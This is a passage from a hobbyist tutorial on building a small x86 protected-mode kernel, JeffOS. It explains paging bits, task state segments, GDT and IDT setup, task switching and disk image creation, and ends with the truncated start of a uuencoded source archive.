+The Page Size Bit tells whether each page is equal to (Bit = 0) 4kb or 
+(Bit = 1) 4MB.  
+
+The accessed bit is used to show whether the page has ever been accessed.  Once
+set to 1, the OS must reset it to 0. This is used for virtual paging.
+
+The Page Cache Disable Bit and Page Write Bit are not currently used by me, so
+I will leave its definition as an exercise to the reader (enjoy).
+
+The User/Supervisor Bit specifies whether access to the page table is
+restricted to access by tasks with privilege level 0,1,2 or 3.  If the bit is
+set to 0 then only tasks with level 0, 1, or 2 can access this page table.  If
+the bit is set to 1, then tasks with level 0, 1, 2, or 3 can access this page
+table.
+
+The Read/Write bit is used to specify whether a user level task can write to
+this page table. If it is set to 0 then it is read only to "User" tasks.  If
+it is set to 1 then it is read/writable by all tasks.
+
+Finally, the Present Bit is used to specify whether the page table is present
+in memory.  If this is set to 1 then it is.
+
+
+Once the page directory is referenced, the offset into the page table is 
+selected.  Using the next 10 bits of the memory reference.  Each page table
+has 1024 entries with each entry having the following structure:
+
+31 - 12    Page Base Address
+11 - 9     Unused (Free bits)
+8 - 7      0
+6          Dirty Bit
+5          Accessed Bit
+4          Page Cache Disable Bit
+3          Page Write Through Bit
+2          User/Supervisor Bit
+1          Read/Write Bit
+0          Page Present Bit
+
+The Page Base Address points to the upper 20 bits in physical memory where
+the memory access points to.  The lower 12 bits are taken from the original
+linear memory access.
+
+The Dirty, Accessed, Page Cache, and Page Write Through Bits are all used for
+virtual memory and other areas which I have not yet been concerned yet.  So
+they are relegated to the reader (for now).
+
+The remaining three bits behave just as in the page directory except that
+they apply to the physical memory page as opposed to a page table.  All
+kernel pages are set to have Supervisor, Read/Write, and Page Present bits
+set.  User pages do not have the supervisor bits set.
+
+The code in kinit_page creates the page directory in the first of the three
+physical pages that it set aside.  The next page is used to create a low (user)
+memory area of 4MB (One page table of 1024 entries points to 1024 4kb pages, 
+Thus 4MB).  The third page is used to point to high (OS) memory.
+
+The kinit_page function sets all of the low page memory equal to physical
+memory.  This means that there is a one to one correlation for the first 4MB
+of memory to paged memory.  kinit_page then maps in ten pages starting at
+70000h linear into 0x80000000.  Entry number 0 of the page directory is then
+set to point to the low page table.  Entry number 512 is set to point to the
+high page table.
+
+Finally the kinit_page function places the address of the page directory
+into the cr3 register.  This tells the processor where to look for the page
+tables.  Finally, cr0 has its paging bit turned on which informs the processor
+that memory accesses should go through the page table rather than just being
+direct physical memory accesses.
+
+After this the _start function is returned into and k_start() has been set to 
+0x80000080 which points to the _start() function in the main kernel.
+_start in the boot code calls this function which starts the real kernel off.
+
+
+----[  Chapter 3 - The Kernel
+
+
+The kernel is where all of the fun begins.  Unfortunately, this is the place
+that needs the most work.  However, there is enough here to demonstrate the
+beginnings of what needs to be done to build a viable kernel for your own work.
+
+The kernel boot loader created the kernel page table and then jumped into the
+kernel at _start(); _start() then sets up the console, clears it, and displays
+the message "Main kernel loaded.".  Once this is done it runs the memory
+manager initialization routine 'kinit_page()'.
+
+The memory manager initialization routine begins by initializing a structure
+called the PMAT.  The PMAT is a giant bit field (2048 bytes), where each bit
+represents one page of physical memory.  If a bit is set to 1, the
+corresponding page of memory is considered allocated.  If the bit is set to 0
+then it is considered unallocated.  Once this array is initialized the memory
+management code sets aside the chunks of physical memory which are already in
+use.  This include the system BUS memory areas, as well as the location of the
+kernel itself in physical memory.  Once this is completed the memory manager
+returns to the _start() function so that it can proceed with kernel
+initialization.
+
+The _start() function then calls a temporary function which I am using now to
+allocate memory which is use by the user program loading in by the first
+stage floppy loader.  This will go away after I add the loading of processes
+off of disk during run time. This function sets aside the physical memory
+which is located at 20000h linear.
+
+Now that the basic memory system is set up the _start() function calls the 
+kinit_task() function.  kinit_task() sets up the kernel task so that it can
+run as a task rather than as a the only process on the system.
+
+kinit_task() is really a shell function which calls two other functions: 
+kinit_gdt() and kinit_ktask(); kinit_gdt() initializes a new kernel GDT which
+is to be used by the kernel rather than the previous temporary one which was
+set up by the second stage floppy boot loader.  Once the new location for the
+gdt is mapped into memory several selectors are added to it.  Kernel Code and
+Data selectors are added.  Also, User Code and Data selectors are added.  Once
+these selectors are put into place, the new gdt is placed in the gdt register
+on the processor so that it can be used.
+
+kinit_task() now calls the kinit_ktask() function.  This task creates a task
+which the kernel code will be executed as.  The first thing this function does
+is to clear out the kernels task list.  This list contains a list of tasks
+on the system.  Next a 4k page is allocated for the kernel task segment.  The
+current executing task is then set to the kernel task. Next the task segment
+is added to the GDT.  This task segment has the following structure and is
+filled out for the kernel with the following values by me.  In fact all tasks
+will start out with these settings.
+
+
+struct TSS {
+    ushort link;            // set to 0
+    ushort unused0;
+    ulong esp0;             // set to the end of the task segment page
+    ushort ss0;             // set to SEL_KDATA (Kernel Data segment)
+    ushort unused1;
+    ulong esp1;             // set to 0
+    ushort ss1;             // set to 0
+    ushort unused2;
+    ulong esp2;             // set to 0
+    ushort ss2;             // set to 0
+    ushort unused3;
+    ulong cr3;              // set to the physical address of this tasks page 
+                            // tables
+    ulong eip;              // set to the entry point to this tasks code
+    ulong eflags;           // set to 0x4202
+    ulong eax, ecx, edx, ebx, esp, ebp, esi, edi; // set to garbage values
+    ushort es;              // set to SEL_KDATA (Kernel data segment)
+    ushort unused4;
+    ushort cs;              // set to SEL_KCODE (Kernel code segment)
+    ushort unused5;
+    ushort ss;              // set to SEL_KDATA
+    ushort unused6;
+    ushort ds;              // set to SEL_KDATA
+    ushort unused7;
+    ushort fs;              // set to SEL_KDATA
+    ushort unused8;
+    ushort gs;              // set to SEL_KDATA
+    ushort unused9;
+    ushort ldt;             // set to 0
+    ushort unused10;
+    ushort debugtrap;       // set to 0
+    ushort iomapbase;       // set to 0
+};
+
+
+The link field is used by the processor when an interrupt is called.  The
+processor places a pointer to the task segment which was running prior to the
+interrupt.  This is useful for determining access rights based on the calling
+process.
+
+The espx and ssx parameters are used to store a pointer to a stack which will 
+be used when a task with a lower privilege level tries to access a high level
+privilege area.
+
+The cr3 parameter is used to store a pointer to the physical address of this
+tasks page table.  Whenever this task is switched to, the processor will load
+the value stored in cr3 into the cr3 register. This means that each task can
+have a unique set of page tables and mappings.
+
+The eax, ebx, etc.. registers are all set to a garbage value as they are
+uninitialized and will only gain values once they are used. When the processor
+switches to this task these parameters will be loaded into their respective
+processor registers.
+
+The cs, es, ss, ds, fs, and gs parameters are all set to meaningful values
+which will be loaded into their respective processor registers when this
+task is switched to.
+
+As I am not using a local descriptor I set this parameter to 0 along with the
+debugtrap and iomapbase parameters.
+
+As I have mentioned every time a task is switched to the processor will load
+all of the parameters from the task segment into their respective registers.
+Likewise, when a task is switched out of, all of the registers will be stored
+in their respective parameters.  This allows tasks to be suspended and to
+restart with the state they left off at.
+
+Switching tasks will be discussed later when the point in the kernel where this
+takes place at is reached.
+
+Once this task state segment is created it is necessary to create an entry in
+the GDT which points to this task segment. The format of this 64 bit entry is
+as follows:
+
+63 - 56    Fourth Byte of Base Address
+55         Granularity Bit
+54 - 53    0
+52         Available for use (free bit)
+51 - 48    Upper Nibble of Size
+47         Present in Memory Bit
+46 - 45    Descriptor Privilege Level
+44         System Built
+43         16/32 Bit
+42         0
+41         Busy Bit
+40         1
+39 - 32    Third Byte of Base Address
+31 - 24    Second Byte of Base Address
+23 - 16    First Byte of Base Address
+15 - 8     Second Byte of Segment Size
+7 - 0      First Byte of Segment Size
+
+As you have probably noticed, this structure is very similar to the code
+segment descriptor. The differences are the 16/32 bit, and the Busy Bit.
+
+The 16/32 Bit specifies whether the task state segment is 16 bit or 32 bit.
+We will only be using the 32 Bit task segment (Bit = 1).  The 16 bit task state
+segment was used for the 286 and was replaced by a 32 bit task state segment on
+the 386+ processors.
+
+The busy bit specifies whether the task is currently busy.  
+
+Once the kernel task is allocated, a new kernel stack is allocated and made
+active. This allows the stack to be in a known and mapped in location which
+uses the memory manager of the kernel.
+
+The user tasks is then created in a similar fashion as the kernel task.  In
+this current implementation the user task is located at 0x20000.  Its stack
+is located at 0x2107c.  Currently, this user task operates with OS level
+privilege.  I encountered some problems when changing its selectors to user
+entries in the GDT.  As soon as I fix this problem I will post a fix on my web
+site.  After the user task is created it is added to the task queue to be
+switched to once the scheduler starts.
+
+Now that the kernel task and a user task (though running with kernel privilege
+level) have been created it is necessary to set up the interrupt tables.  This
+is done by a call to the kinit_idt() function.
+
+kinit_idt() starts by setting all of the interrupts to point to a null 
+interrupt function.  This means that for most interrupts a simple return
+occurs.  However, interrupt handlers for the timer as well as for one system
+call.  Also, interrupts are set up to handle the various exceptions.  Once
+this table is filled out the interrupt descriptor table (IDT) is loaded into
+the idt register. The interrupts are then enabled to allow them to be called.
+
+The timer interrupt handler is a simple function which calls a task switch
+every time the hardware timer fires.
+
+The system call (interrupt 22h) is called, the handler will print out on the
+console the string which is pointed to be the eax register.
+
+The exception handling routine will dump the task registers and then hang the
+system.  The jump.S file in JeffOS/kernel/ contains the assembly wrappers which
+are called when an interrupt occurs.  These wrapper functions then call the C
+handler functions.  
+
+Now that the IDT is set up and interrupts are occurring task switches can occur.
+These occur when the swtch() function is called in the task.c file.  The
+swtch() function locates the next task in its queue and does a call to the
+selector address of the new task.  This causes the processor to look up the
+selector and switch to the new task.
+
+You now have a very simple multi-tasking kernel.
+
+
+----[  Chapter 4 - User level libraries
+
+
+The user level libraries are fairly simplistic.
+
+There are two files in this directory.  The first is the crt0.c file.
+This file contains one function which is the _start() function.  This function
+makes a call to main which will be defined in user code.  This stub function
+must always be linked in first as it will be jumped into by the kernel to
+begin running the process.
+
+The second file is the syscall.c file.  This file contains one system call
+function which is simply an interrupt 22.  This interrupt calls the console
+system call.  eax is passed in as a pointer to a string which is printed to
+the system console.
+
+Both of these source files are compiled to objects and are used during the
+linking phase of any user code.
+
+
+----[  Chapter 5 - User code
+
+
+The user code is stored in one file called test.c.  This file is located in
+the /user/ directory.  All this code does is call the console system call
+function provided by the library, wait a short amount of time, and call it
+again in a non-terminating loop (good thing, as I don't handle task
+termination yet).
+
+The important thing to note is that when linking this user process is set to
+have a text segment of 20000h linear.  Also the crt0.o and syscall.o files are
+linked in as well.  crt0.o is linked in first to insure that its _start()
+function is at 20080h so it will be jumped into by the kernel.  In truth,
+_start() is the real main as opposed to the main() everyone is used to dealing
+with.
+
+This code is the task which is created and run alongside the kernel, as
+described in chapter 3.
+
+
+----[  Chapter 6 - Creating a disk image out of the binaries
+
+
+Once you have compiled all of the binaries and placed them into the build
+directory you will need to create two more files before continuing.  These
+files are called STUFF.BIN and STUFF2.BIN.  These files are simply containers
+of empty space to cause alignment of other binaries.  The floppy loader
+expects the user program to be 1k in size.  If the user program is not exactly
+this size then STUFF2.BIN needs to be created and be of such a size that when
+added to USER.BIN the size is 1024 bytes.  Also, the floppy boot loader
+expects the kernel boot loader to be 3.5k (3584 bytes) in size.  STUFF.BIN
+needs to be made of such length that when added to the size of the BOOT.BIN
+(kernel boot loader) file the size will be 3584 bytes.  In the future I will
+try to automate this process, but for now this is simply how it must be done.
+Once this is complete the shell program 'go' must be run.  This will place all
+of the binary files into one file called 'os.bin'.  This file can then be
+written to disk by one of the following two methods.
+
+If you want to do it from linux you can do the following command:
+
+dd if=os.bin of=/dev/fd0  (places os.bin directly onto the floppy disk)
+
+or from DOS you can obtain the rawrite command and run it and follow its
+directions.
+
+
+----[  Conclusion
+
+
+The kernel contained within is far from complete.  However, it is a first step
+towards creating a real protected mode operating system.  It is also enough to
+begin working with, or to refer to during you own work on a protected mode
+operating system.  Doing this work is simply both one of the most rewarding
+things you will ever do, and one of the most frustrating.  Many a night has
+been spent at the local tavern telling war stories about this stuff.  But in
+the end, it has all been great fun.
+
+I wish you all the best of luck!
+
+Jeff Thompson
+jwthomp@cu-online.com
+http://www.cu-online.com/~jwthomp/
+
+<++> JeffOS.tgz.uue
+begin 600 JeffOS.tgz
+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
